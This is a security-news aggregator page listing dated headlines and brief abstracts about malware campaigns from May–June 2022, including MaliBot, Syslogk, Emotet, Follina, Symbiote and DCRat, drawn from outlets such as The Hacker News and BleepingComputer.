A new strain of Android malware has been spotted in the wild targeting online banking and cryptocurrency wallet customers in Spain and Italy, just weeks after a coordinated law enforcement operation dismantled FluBot . The information stealing trojan, codenamed MaliBot by F5 Labs, is as feature-rich as its counterparts , allowing it to steal credentials and cookies, bypass multi-factor authentication (MFA) codes, and abuse Android's Accessibility Service to monitor the victim's device screen. MaliBot is known to primarily disguise itself as cryptocurrency mining apps such as Mining X or The CryptoApp that are distributed via fraudulent websites designed to attract potential visitors into downloading them. It also takes another leaf out of the mobile banking trojan playbook in that it employs smishing as a distribution vector to proliferate the malware by accessing an infected smartphone's contacts and sending SMS messages containing links to the malware. "MalThe Hacker News
June 15, 2022
PureCrypter Loader Updated with New Modules Full Text
Abstract
Written in .NET language and obfuscated with SmartAssembly, the loader makes use of compression and encryption to evade detection by antivirus software. It first appeared in March 2021 and has since been put for sale at a price of $59.Cyware Alerts - Hacker News
June 14, 2022
Android malware on the Google Play Store gets 2 million downloads Full Text
Abstract
Cybersecurity researchers have discovered adware and information-stealing malware on the Google Play Store last month, with at least five still available and having amassed over two million downloads.BleepingComputer
June 14, 2022
Industroyer: A cyber‑weapon that brought down a power grid Full Text
Abstract
On June 12, 2017, ESET researchers published their findings about a malware that was capable of causing a widespread blackout. Industroyer, as they named it, was the first known piece of malware that was developed specifically to target a power grid.ESET Security
June 14, 2022
Experts spotted Syslogk, a Linux rootkit under development Full Text
Abstract
Experts spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses specially crafted "magic packets" to activate a dormant backdoor on the device. Researchers from antivirus firm Avast spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses...Security Affairs
June 14, 2022
New Syslogk Linux Rootkit Lets Attackers Remotely Command It Using “Magic Packets” Full Text
Abstract
A new covert Linux kernel rootkit named Syslogk has been spotted under development in the wild and cloaking a malicious payload that can be remotely commandeered by an adversary using a magic network traffic packet . "The Syslogk rootkit is heavily based on Adore-Ng but incorporates new functionalities making the user-mode application and the kernel rootkit hard to detect," Avast security researchers David Álvarez and Jan Neduchal said in a report published Monday. Adore-Ng, an open-source rootkit available since 2004, equips the attacker with full control over a compromised system. It also facilitates hiding processes as well as custom malicious artifacts, files, and even the kernel module, making it harder to detect. "The module starts by hooking itself into various file systems. It digs up the inode for the root filesystem, and replaces that inode's readdir() function pointer with one of its own," LWN.net noted at the time. "The Adore verThe Hacker News
June 13, 2022
Three PyPI Packages Found Including Password Stealer by Mistake Full Text
Abstract
Three PyPI packages were found to contain a backdoor due to a malicious dependency within certain versions, thereby exposing users to supply chain attacks. The threat included with the ‘Keep’ package is pretty high as it particularly receives over 8,000 downloads per week on average. Even if P ... Read MoreCyware Alerts - Hacker News
June 13, 2022
Metasploit 6.2.0 improves credential theft, SMB support features, more Full Text
Abstract
Metasploit 6.2.0 has been released with 138 new modules, 148 new improvements/features, and 156 bug fixes since version 6.1.0 was released in August 2021.BleepingComputer
June 13, 2022
New Syslogk Linux rootkit uses magic packets to trigger backdoor Full Text
Abstract
A new rootkit malware named 'Syslogk' has been spotted in the wild, and it features advanced process and file hiding techniques that make detection highly unlikely.BleepingComputer
June 12, 2022
PyPI package ‘keep’ mistakenly included a password stealer Full Text
Abstract
PyPI packages 'keep,' 'pyanxdns,' 'api-res-py' were found to contain a password-stealer and a backdoor due to the presence of malicious 'request' dependency within some versions.BleepingComputer
June 11, 2022
Emotet Goes After Google Chrome Users to Steal Credit Card Details Full Text
Abstract
Emotet was found dropping a new module to pilfer credit card information stored in the Chrome web browser. During April, Emotet malware activity increased, and one week later, it began using Windows shortcut files (.LNK) to execute PowerShell commands on victims' devices.Cyware Alerts - Hacker News
June 11, 2022
PoC Exploits for Atlassian RCE Bug Exploit Released Online Full Text
Abstract
Proof-of-concept exploits for the actively exploited critical CVE-2022-26134 vulnerability impacting Atlassian Confluence and Data Center servers is out. The vulnerability that can be exploited by a threat actor to execute unauthenticated RCE, leading to a total domain takeover. However, this vulne ... Read MoreCyware Alerts - Hacker News
June 10, 2022
New Variant of Black Basta Targets VMware ESXi Servers Full Text
Abstract
The Black Basta ransomware developed a Linux version that is now targeting VMware ESXi servers. The updated version allows faster encryption of multiple servers with a single command. Recently, the ransomware group joined hands with QBot to move laterally across the victim's network. Organizations ... Read MoreCyware Alerts - Hacker News
June 10, 2022
Emotet Banking Trojan Resurfaces, Skating Past Email Security Full Text
Abstract
"The attacks are using hijacked email threads and then using those accounts as a launch point to trick victims into enabling macros of attached malicious office documents," a Thursday report from Deep Instinct explained.Dark Reading
June 9, 2022
Symbiote, a nearly-impossible-to-detect Linux malware Full Text
Abstract
Researchers uncovered a high stealth Linux malware, dubbed Symbiote, that could be used to backdoor infected systems. Joint research conducted by security firms Intezer and BlackBerry uncovered a new Linux threat dubbed Symbiote. The name comes...Security Affairs
June 09, 2022
Symbiote: A Stealthy Linux Malware Targeting Latin American Financial Sector Full Text
Abstract
Cybersecurity researchers have taken the wraps off what they call a "nearly-impossible-to-detect" Linux malware that could be weaponized to backdoor infected systems. Dubbed Symbiote by threat intelligence firms BlackBerry and Intezer, the stealthy malware is so named for its ability to conceal itself within running processes and network traffic and drain a victim's resources like a parasite . The operators behind Symbiote are believed to have commenced development on the malware in November 2021, with the threat actor predominantly using it to target the financial sector in Latin America, including banks like Banco do Brasil and Caixa. "Symbiote's main objective is to capture credentials and to facilitate backdoor access to a victim's machine," researchers Joakim Kennedy and Ismael Valenzuela said in a report shared with The Hacker News. "What makes Symbiote different from other Linux malware is that it infects running processes rather thanThe Hacker News
June 09, 2022
New Symbiote malware infects all running processes on Linux systems Full Text
Abstract
Threat analysts have discovered a new malware targeting Linux systems that operates as a symbiote in the host, blending perfectly with running processes and network traffic to steal account credentials and give its operators backdoor access.BleepingComputer
June 9, 2022
New Emotet variant uses a module to steal data from Google Chrome Full Text
Abstract
Researchers spotted a new variant of the Emotet bot that uses a new module to steal credit card information stored in the Chrome web browser. Proofpoint researchers reported a new wave of Emotet infections, in particular, a new variant is using a new info-stealing...Security Affairs
June 08, 2022
New Emotet Variant Stealing Users’ Credit Card Information from Google Chrome Full Text
Abstract
Image Source: Toptal The notorious Emotet malware has turned to deploy a new module designed to siphon credit card information stored in the Chrome web browser. The credit card stealer, which exclusively singles out Chrome, has the ability to exfiltrate the collected information to different remote command-and-control (C2) servers, according to enterprise security company Proofpoint , which observed the component on June 6. The development comes amid a spike in Emotet activity since it was resurrected late last year following a 10-month-long hiatus in the wake of a law enforcement operation that took down its attack infrastructure in January 2021. Emotet, attributed to a threat actor known as TA542 (aka Mummy Spider or Gold Crestwood), is an advanced, self-propagating and modular trojan that's delivered via email campaigns and is used as a distributor for other payloads such as ransomware. As of April 2022, Emotet is still the most popular malware with a global impacThe Hacker News
June 08, 2022
Emotet malware now steals credit cards from Google Chrome users Full Text
Abstract
The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to harvest credit card information stored in Google Chrome user profiles.BleepingComputer
June 07, 2022
New SVCReady malware loads from Word doc properties Full Text
Abstract
A previously unknown malware loader named SVCReady has been discovered in phishing attacks, featuring an unusual way of loading the malware from Word documents onto compromised machines.BleepingComputer
June 07, 2022
Qbot malware now uses Windows MSDT zero-day in phishing attacks Full Text
Abstract
A critical Windows zero-day vulnerability, known as Follina and still waiting for an official fix from Microsoft, is now being actively exploited in ongoing phishing attacks to infect recipients with Qbot malware.BleepingComputer
June 06, 2022
10 Most Prolific Banking Trojans Targeting Hundreds of Financial Apps with Over a Billion Users Full Text
Abstract
10 of the most prolific mobile banking trojans have set their eyes on 639 financial applications that are available on the Google Play Store and have been cumulatively downloaded over 1.01 billion times. Some of the most targeted apps include Walmart-backed PhonePe, Binance, Cash App, Garanti BBVA Mobile, La Banque Postale, Ma Banque, Caf - Mon Compte, Postepay, and BBVA México. These apps alone account for more than 260 million downloads from the official app marketplace. Of the 639 apps tracked, 121 are based in the U.S., followed by the U.K. (55), Italy (43), Turkey (34), Australia (33), France (31), Spain (29), and Portugal (27). " TeaBot is targeting 410 of the 639 applications tracked," mobile security company Zimperium said in a new analysis of Android threats during the first half of 2022. " Octo targets 324 of the 639 applications tracked and is the only one targeting popular, non-financial applications for credential theft." Aside from TeaBot (The Hacker News
June 04, 2022
SMSFactory Android malware sneakily subscribes to premium services Full Text
Abstract
Security researchers are warning of an Android malware named SMSFactory that adds unwanted costs to the phone bill by subscribing victims to premium services.BleepingComputer
June 03, 2022
Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network Full Text
Abstract
The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research. Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites. Parrot TDS was documented in April 2022 by Czech cybersecurity company Avast, noting that the PHP script had ensnared web servers hosting more than 16,500 websites to act as a gateway for further attack campaigns. This involves appending a piece of malicious code to all JavaScript files on compromised web servers hosting content management systems (CMS) such as WordPress that are in turn said to be breached by taking advantage of weak login credentials and vulnerable plugins. Besides using different obfuscation tactics to conceal the code, the "injected JavaScript may also be found well indentThe Hacker News
June 02, 2022
Top 10 Android banking trojans target apps with 1 billion downloads Full Text
Abstract
The ten most prolific Android mobile banking trojans target 639 financial applications that collectively have over one billion downloads on the Google Play Store.BleepingComputer
June 01, 2022
SideWinder hackers plant fake Android VPN app in Google Play Store Full Text
Abstract
Phishing campaigns attributed to an advanced threat actor called SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.BleepingComputer
May 30, 2022
Linux malware is on the rise—6 types of attacks to look for Full Text
Abstract
Security is the weakest when sysadmins and developers race against time and deadlines. Opportunistic attackers take advantage of the "economy of attention" as developers can often overlook security risks.CSO Online
May 30, 2022
Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild Full Text
Abstract
Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems. The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (" 05-2022-0438.doc ") that was uploaded to VirusTotal from an IP address in Belarus. "It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code," the researchers noted in a series of tweets last week. According to security researcher Kevin Beaumont, who dubbed the flaw "Follina," the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload. The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in tThe Hacker News
May 30, 2022
EnemyBot malware adds new exploits to target CMS servers and Android devices Full Text
Abstract
The operators of the EnemyBot botnet added exploits for recently disclosed flaws in VMware, F5 BIG-IP, and Android systems. Operators behind the EnemyBot botnet are expanding the list of potential targets adding exploits for recently disclosed critical...Security Affairs
May 29, 2022
EnemyBot malware adds exploits for critical VMware, F5 BIG-IP flaws Full Text
Abstract
EnemyBot, a botnet based on code from multiple malware pieces, is expanding its reach by quickly adding exploits for recently disclosed critical vulnerabilities in web servers, content management systems, IoT, and Android devices.BleepingComputer
May 28, 2022
New Windows Subsystem for Linux malware steals browser auth cookies Full Text
Abstract
Hackers are showing an increased interest in the Windows Subsystem for Linux (WSL) as an attack surface as they build new malware, the more advanced samples being suitable for espionage and downloading additional malicious modules.BleepingComputer
May 27, 2022
ERMAC 2.0 Android Banking Trojan targets over 400 apps Full Text
Abstract
A new version of the ERMAC Android banking trojan is able to target an increased number of apps. The ERMAC Android banking trojan version 2.0 can target an increasing number of applications, passing from 378 to 467 target applications to steal account...Security Affairs
May 26, 2022
Experts Warn of Rise in ChromeLoader Malware Hijacking Users’ Browsers Full Text
Abstract
A malvertising threat is witnessing a new surge in activity since its emergence earlier this year. Dubbed ChromeLoader , the malware is a "pervasive and persistent browser hijacker that modifies its victims' browser settings and redirects user traffic to advertisement websites," Aedan Russell of Red Canary said in a new report. ChromeLoader is a rogue Chrome browser extension and is typically distributed in the form of ISO files via pay-per-install sites and baited social media posts that advertise QR codes to cracked video games and pirated movies. While it primarily functions by hijacking user search queries to Google, Yahoo, and Bing and redirecting traffic to an advertising site, it's also notable for its use of PowerShell to inject itself into the browser and get the extension added. The malware, also known as Choziosi Loader, was first documented by G DATA earlier this February. "For now the only purpose is getting revenue via unsolicited advertiThe Hacker News
May 26, 2022
New ERMAC 2.0 Android malware steals accounts, wallets from 467 apps Full Text
Abstract
The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto wallets.BleepingComputer
May 25, 2022
New ChromeLoader malware surge threatens browsers worldwide Full Text
Abstract
The ChromeLoader malware is seeing an uptick in detections this month, following a relatively stable operation volume since the start of the year, which means that the malvertiser is now becoming a widespread threat.BleepingComputer
May 25, 2022
Windows Exploits Used to Target Infosec Community Full Text
Abstract
Cyble researchers spotted a malware campaign targeting the infoSec community via a fake PoC exploit code for RPC Runtime RCE flaw. The fake exploit was distributed via GitHub. By attacking the infosec community, attackers are probably trying to gain access to vulnerability research or steal other p ... Read MoreCyware Alerts - Hacker News
May 25, 2022
Credit Card Stealer Targets PsiGate Payment Gateway Software Full Text
Abstract
The malware injection leverages the #psigate_cc_number, #psigate_expiration, #psigate_expiration_yr and #psigate_cc_cid fields (among others) to harvest customer’s payment data and details whenever the text fields are submitted on the checkout page.Sucuri
May 25, 2022
BPFDoor malware uses Solaris vulnerability to get root privileges Full Text
Abstract
New research into the inner workings of the stealthy BPFdoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems.BleepingComputer
May 24, 2022
Nation-state malware could become a commodity on dark web soon, Interpol warns Full Text
Abstract
In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide.Security Affairs
May 24, 2022
Microsoft: Credit card stealers are getting much stealthier Full Text
Abstract
Microsoft's security researchers have observed a worrying trend in credit card skimming, where threat actors employ more advanced techniques to hide their malicious info-stealing code.BleepingComputer
May 24, 2022
Malware Analysis: Trickbot Full Text
Abstract
In this day and age, we are not dealing with roughly pieced together, homebrew type of viruses anymore. Malware is an industry, and professional developers are found to exchange, be it by stealing one's code or deliberate collaboration. Attacks are multi-layer these days, with diverse sophisticated software apps taking over different jobs along the attack-chain from initial compromise to ultimate data exfiltration or encryption. The specific tools for each stage are highly specialized and can often be rented as a service, including customer support and subscription models for professional (ab)use. Obviously, this has largely increased both the availability and the potential effectiveness and impact of malware. Sound scary? Well, it does, but the apparent professionalization actually does have some good sides too. One factor is that certain reused modules commonly found in malware can be used to identify, track, and analyze professional attack software. Ultimately this means thatThe Hacker News
May 23, 2022
Fake Windows exploits target infosec community with Cobalt Strike Full Text
Abstract
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.BleepingComputer
May 23, 2022
Mirai Malware for Linux Double Down on Stronger Chips Full Text
Abstract
Popular for compromising internet-connected devices and conducting distributed denial of service (DDoS) attacks, Mirai malware variants have been known to compromise devices that run on Linux builds.Crowdstrike
May 22, 2022
PDF smuggles Microsoft Word doc to drop Snake Keylogger malware Full Text
Abstract
Threat analysts have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.BleepingComputer
May 21, 2022
Malicious PyPI package opens backdoors on Windows, Linux, and Macs Full Text
Abstract
Yet another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems.BleepingComputer
May 20, 2022
Researchers Find Backdoor in School Management Plugin for WordPress Full Text
Abstract
Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites. The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity. The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up. School Management, developed by an India-based company called Weblizar , is billed as a Wordpress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins. The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of tThe Hacker News
May 20, 2022
Backdoor baked into premium school management plugin for WordPress Full Text
Abstract
Security researchers have discovered a backdoor in a premium WordPress plugin built as a complete management solution for schools. The malicious code enables a threat actor to execute PHP code without authenticating.BleepingComputer
May 20, 2022
Microsoft Warns Rise in XorDdos Malware Targeting Linux Devices Full Text
Abstract
A Linux botnet malware known as XorDdos has witnessed a 254% surge in activity over the last six months, according to latest research from Microsoft. The trojan, so named for carrying out denial-of-service attacks on Linux systems and its use of XOR-based encryption for communications with its command-and-control (C2) server, is known to have been active since at least 2014. "XorDdos' modular nature provides attackers with a versatile trojan capable of infecting a variety of Linux system architectures," Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or of the Microsoft 365 Defender Research Team said in an exhaustive deep-dive of the malware. "Its SSH brute-force attacks are a relatively simple yet effective technique for gaining root access over a number of potential targets." Remote control over vulnerable IoT and other internet-connected devices is gained by means of secure shell (SSH) brute-force attacks, enabling the malware to form a botnetThe Hacker News
May 20, 2022
Dridex Infection Chain Case Studies Full Text
Abstract
Recently, during December 2021, Unit 42 researchers received various Dridex samples, which were exploiting XLL and XLM 4.0 in combination with Discord and OneDrive to download the final payload.Palo Alto Networks
May 19, 2022
Microsoft detects massive surge in Linux XorDDoS malware activity Full Text
Abstract
A stealthy and modular malware used to hack into Linux devices and build a DDoS botnet has seen a massive 254% increase in activity during the last six months, as Microsoft revealed today.BleepingComputer
May 18, 2022
UpdateAgent Updated with New Malware Dropper Full Text
Abstract
A new variant of UpdateAgent macOS malware was tracked, indicating ongoing attempts on the part of its authors to upgrade its functionalities. The new dropper is a Swift-based executable, which masquerades as Mach-O binaries such as PDFCreator and ActiveDirectory. It is recommended to stay a ... Read MoreCyware Alerts - Hacker News
May 18, 2022
New SYK Crypter Propagates via Discord Full Text
Abstract
Threat actors are abusing Discord’s CDN with the new SYK crypter designed to dodge behavior-based security controls while opening a gate to different malware families, such as AsyncRAT, NanoCore RAT, and more. The increasing number of people using the community chat platform has continued attractin ... Read MoreCyware Alerts - Hacker News
May 18, 2022
Microsoft warns of the rise of cryware targeting hot wallets Full Text
Abstract
Microsoft researchers warn of the rising threat of cryware targeting non-custodial cryptocurrency wallets, also known as hot wallets. Microsoft warns of the rise of cryware, malicious software used to steal info an dfunds from non-custodial cryptocurrency...Security Affairs
May 18, 2022
Experts spotted a new variant of UpdateAgent macOS malware dropper written in Swift Full Text
Abstract
Researchers spotted a new variant of the UpdateAgent macOS malware dropper that was employed in attacks in the wild. Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version...Security Affairs
May 18, 2022
Microsoft Warns of “Cryware” Info-Stealing Malware Targeting Crypto Wallets Full Text
Abstract
Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks. The tech giant dubbed the new threat "cryware," with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet. "Cryware are information stealers that collect and exfiltrate data directly from non-custodial cryptocurrency wallets, also known as hot wallets ," Berman Enconado and Laurie Kirk of the Microsoft 365 Defender Research Team said in a new report. "Because hot wallets, unlike custodial wallets, are stored locally on a device and provide easier access to cryptographic keys needed to perform transactions, more and more threats are targeting them." Attacks of this kind are not theoretical. Earlier this year, Kaspersky disclosed a financially-motivated campaign staged by the North Korea-based Lazarus GrThe Hacker News
May 17, 2022
UpdateAgent Returns with New macOS Malware Dropper Written in Swift Full Text
Abstract
A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities. "Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat Labs said in a report. UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections. The newly discovered Swift-based dropper masquerades as Mach-O binaries named " PDFCreator " and " ActiveDirectory " that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed. "The primary difference [between the two executables] is that it reaches out to a different URL from whThe Hacker News
May 17, 2022
Over 200 Apps on Play Store were distributing Facestealer info-stealer Full Text
Abstract
Experts spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data. Trend Micro researchers spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used...Security Affairs
May 17, 2022
A custom PowerShell RAT uses to target German users using Ukraine crisis as bait Full Text
Abstract
Researchers spotted a threat actor using a custom PowerShell RAT targeting German users to gain intelligence on the Ukraine crisis. Malwarebytes experts uncovered a campaign that targets German users with custom PowerShell RAT targeting. The threat...Security Affairs
May 17, 2022
Over 200 Apps on Play Store Caught Spying on Android Users Using Facestealer Full Text
Abstract
More than 200 Android apps masquerading as fitness, photo editing, and puzzle apps have been observed distributing spyware called Facestealer to siphon user credentials and other valuable information. "Similar to Joker , another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants," Trend Micro analysts Cifer Fang, Ford Quin, and Zhengyu Dong said in a new report. "Since its discovery, the spyware has continuously beleaguered Google Play." Facestealer, first documented by Doctor Web in July 2021, refers to a group of fraudulent apps that invade the official app marketplace for Android with the goal of plundering sensitive data such as Facebook login credentials. Of the 200 apps, 42 are VPN services, followed by a camera (20) and photo editing applications (13). In addition to harvesting credentials, the apps are also designed to collect Facebook cookies and personally identifiable information associated with a vicThe Hacker News
May 16, 2022
Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys Full Text
Abstract
Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants. Since its discovery, the spyware has continuously beleaguered Google Play.Trend Micro
May 16, 2022
Researchers Warn of “Eternity Project” Malware Service Being Sold via Telegram Full Text
Abstract
An unidentified threat actor has been linked to an actively in-development malware toolkit called the "Eternity Project" that lets professional and amateur cybercriminals buy stealers, clippers, worms, miners, ransomware, and a distributed denial-of-service (DDoS) bot. What makes this malware-as-a-service (MaaS) stand out is that besides using a Telegram channel to communicate updates about the latest features, it also employs a Telegram Bot that enables the purchasers to build the binary. "The [threat actors] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies," researchers from Cyble said in a report published last week. Each of the modules can be leased separately and provides paid access to a wide variety of functions - Eternity Stealer ($260 for an annual subscription) - Siphon passwords, cookies, credit cards, browser cryptocurrency extensions, cryptThe Hacker News
May 15, 2022
Eternity Project - A New Swiss Army Knife for Threat Actors Full Text
Abstract
Threat actors are using Tor and Telegram to spread the Eternity malware that is customizable to modules, including a stealer, clipper, worm, miner, and ransomware. It can pilfer information from cryptocurrency extensions or even cold wallets. It also targets password managers, VPN clients, messenge ... Read MoreCyware Alerts - Hacker News
May 13, 2022
Fake Binance NFT Mystery Box bots steal victim’s crypto wallets Full Text
Abstract
A new RedLine malware distribution campaign promotes fake Binance NFT mystery box bots on YouTube to lure people into infecting themselves with the information-stealing malware from GitHub repositories.BleepingComputer
May 12, 2022
Malware Builder Leverages Discord Webhooks Full Text
Abstract
Researchers discovered a simple malware builder designed to steal credentials, then pinging them to Discord webhooks.Threatpost
May 12, 2022
Eternity malware kit offers stealer, miner, worm, ransomware tools Full Text
Abstract
Threat actors have launched the 'Eternity Project,' a new malware-as-a-service where threat actors can purchase a malware toolkit that can be customized with different modules depending on the attack being conducted.BleepingComputer
May 12, 2022
BPFdoor: Stealthy Linux malware bypasses firewalls for remote access Full Text
Abstract
A recently discovered backdoor malware called BPFdoor has been stealthily targeting Linux and Solaris systems without being noticed for more than five years.BleepingComputer
May 11, 2022
Hackers Deploy IceApple Exploitation Framework on Hacked MS Exchange Servers Full Text
Abstract
Researchers have detailed a previously undocumented .NET-based post-exploitation framework called IceApple that has been deployed on Microsoft Exchange server instances to facilitate reconnaissance and data exfiltration. "Suspected to be the work of a state-nexus adversary, IceApple remains under active development, with 18 modules observed in use across a number of enterprise environments, as of May 2022," CrowdStrike said in a Wednesday report. The cybersecurity firm, which discovered the sophisticated malware in late 2021, noted its presence in multiple victim networks and in geographically distinct locations. Targeted victims span a wide range of sectors, including technology, academic, and government entities. A post-exploitation toolset, as the name implies, is not used to provide initial access, but is rather employed to carry out follow-on attacks after having already compromised the hosts in question. IceApple is notable for the fact that it's an in-memoThe Hacker News
May 11, 2022
Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K Full Text
Abstract
A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022. "The newly identified Nerbian RAT leverages multiple anti-analysis components spread across several stages, including multiple open-source libraries," Proofpoint researchers said in a report shared with The Hacker News. "It is written in operating system (OS) agnostic Go programming language, compiled for 64-bit systems, and leverages several encryption routines to further evade network analysis." The messages, amounting to less than 100 in number, purport to be from the World Health Organization about safety measures related to COVID-19, urging potential victims to open a macrThe Hacker News
May 11, 2022
New stealthy Nerbian RAT malware spotted in ongoing attacks Full Text
Abstract
A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.BleepingComputer
May 11, 2022
Malicious NPM Packages Target German Companies in Supply Chain Attack Full Text
Abstract
Cybersecurity researchers have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent media, logistics, and industrial firms based in Germany to carry out supply chain attacks . "Compared with most malware found in the NPM repository, this payload seems particularly dangerous: a highly-sophisticated, obfuscated piece of malware that acts as a backdoor and allows the attacker to take total control over the infected machine," researchers from JFrog said in a new report. The DevOps company said that evidence points to it being either the work of a sophisticated threat actor or a "very aggressive" penetration test. All the rogue packages, most of which have since been removed from the repository, have been traced to four "maintainers" - bertelsmannnpm, boschnodemodules, stihlnodemodules, and dbschenkernpm — indicating an attempt to impersonate legitimate firms like Bertelsmann, Bosch, Stihl, and DB ScThe Hacker News
May 11, 2022
New IceApple exploit toolset deployed on Microsoft Exchange servers Full Text
Abstract
Security researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography.BleepingComputer
May 11, 2022
DCRat Being Sold on Russian Hacking Forums at Dirt Cheap Rates Full Text
Abstract
Malware authors were spotted selling a capable trojan named DCRat on underground forums. The still-under-development threat comes equipped with a variety of information-stealing abilities. As for protection, always install a reliable anti-malware solution.Cyware Alerts - Hacker News
May 11, 2022
NetDooka Leverages PrivateLoader Distribution Service to Infect Victims Full Text
Abstract
The new NetDooka malware framework is being distributed by PrivateLoader’s PPI service that features a loader, a dropper, a protection driver, and a powerful NetDooka RAT. PrivateLoader PPI is a malware distribution platform that uses SEO poisoning and files uploaded to torrent sites.Cyware Alerts - Hacker News
May 11, 2022
Raspberry Robin Worm Found Dropping Malware Full Text
Abstract
A new malware dubbed Raspberry Robin, having worm-like capabilities, is spreading via external USB drives to target several firms’ networks in the technology and manufacturing sectors. The worm abuses the Microsoft Standard Installer to make a connection to its C2 servers. Go through this repor ... Read MoreCyware Alerts - Hacker News
May 10, 2022
Experts Detail Saintstealer and Prynt Stealer Info-Stealing Malware Families Full Text
Abstract
Cybersecurity researchers have dissected the inner workings of an information-stealing malware called Saintstealer that's designed to siphon credentials and system information. "After execution, the stealer extracts username, passwords, credit card details, etc.," Cyble researchers said in an analysis last week. "The stealer also steals data from various locations across the system and compresses it in a password-protected ZIP file." A 32-bit C# .NET-based executable with the name "saintgang.exe," Saintstealer is equipped with anti-analysis checks, opting to terminate itself if it's running either in a sandboxed or virtual environment. The malware can capture a wide range of information that ranges from taking screenshots to gathering passwords, cookies, and autofill data stored in Chromium-based browsers such as Google Chrome, Opera, Edge, Brave, Vivaldi, and Yandex, among others. It can also steal Discord multi-factor authentication tokeThe Hacker News
May 09, 2022
Experts Sound Alarm on DCRat Backdoor Being Sold on Russian Hacking Forums Full Text
Abstract
Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat (aka DarkCrystal RAT) that's offered on sale for "dirt cheap" prices, making it accessible to professional cybercriminal groups and novice actors alike. "Unlike the well-funded, massive Russian threat groups crafting custom malware [...], this remote access Trojan (RAT) appears to be the work of a lone actor, offering a surprisingly effective homemade tool for opening backdoors on a budget," BlackBerry researchers said in a report shared with The Hacker News. "In fact, this threat actor's commercial RAT sells at a fraction of the standard price such tools command on Russian underground forums." Written in .NET by an individual codenamed "boldenis44" and "crystalcoder," DCRat is a full-featured backdoor whose functionalities can be further augmented by third-party plugins developed by affiliates using a dedicated integratedThe Hacker News
May 9, 2022
DCRat, only $5 for a fully working remote access trojan Full Text
Abstract
Researchers warn of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums. Cybersecurity researchers from BlackBerry are warning of a remote access trojan called DCRat (aka DarkCrystal RAT)...Security Affairs
May 09, 2022
Another Set of Joker Trojan-Laced Android Apps Resurfaces on Google Play Store Full Text
Abstract
A new set of trojanized apps spread via the Google Play Store has been observed distributing the notorious Joker malware on compromised Android devices. Joker, a repeat offender , refers to a class of harmful apps that are used for billing and SMS fraud, while also performing a number of actions of a malicious hacker's choice, such as stealing text messages, contact lists, and device information. Despite continued attempts on the part of Google to scale up its defenses, the apps have been continually iterated to search for gaps and slip into the app store undetected. "They're usually spread on Google Play, where scammers download legitimate apps from the store, add malicious code to them and re-upload them to the store under a different name," Kaspersky researcher Igor Golovin said in a report published last week. The trojanized apps, taking the place of their removed counterparts, often appear as messaging, health tracking, and PDF scanner apps that, onceThe Hacker News
May 09, 2022
Hackers are now hiding malware in Windows Event Logs Full Text
Abstract
